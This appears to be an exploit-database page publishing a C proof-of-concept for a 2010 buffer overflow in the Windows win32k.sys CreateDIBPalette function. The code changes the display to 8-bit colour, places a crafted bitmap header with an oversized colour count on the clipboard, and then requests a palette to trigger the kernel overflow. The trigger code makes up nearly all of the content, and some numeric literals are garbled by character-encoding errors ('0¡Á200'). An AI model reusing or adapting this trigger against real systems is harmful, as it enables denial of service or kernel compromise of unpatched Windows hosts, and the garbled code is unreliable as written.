[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Microsoft Windows win32k.sys Driver "CreateDIBPalette()" Buffer Overflow
# Published : 2010-08-06
# Author : Arkon
# Previous Title : myMP3-Player v3.0 Buffer Overflow Exploit
# Next Title : Fat Player 0.6b WAV File Processing Buffer Overflow (SEH)
Sources:
http://www.ragestorm.net/blogs/?p=255
http://secunia.com/advisories/40870/
DEVMODE dm = {0};
dm.dmSize = sizeof(DEVMODE);
dm.dmBitsPerPel = 8;
dm.dmPelsWidth = 800;
dm.dmPelsHeight = 600;
dm.dmFields = DM_PELSWIDTH | DM_PELSHEIGHT | DM_BITSPERPEL;
ChangeDisplaySettings(&dm, 0);
BITMAPINFOHEADER bmih = {0};
bmih.biClrUsed = 0¡Á200;
HGLOBAL h = GlobalAlloc(GMEM_FIXED, 0¡Á1000);
memcpy((PVOID)GlobalLock(h), &bmih, sizeof(bmih));
GlobalUnlock(h);
OpenClipboard(NULL);
SetClipboardData(CF_DIBV5, (HANDLE)h);
CloseClipboard();
OpenClipboard(NULL);
GetClipboardData(CF_PALETTE);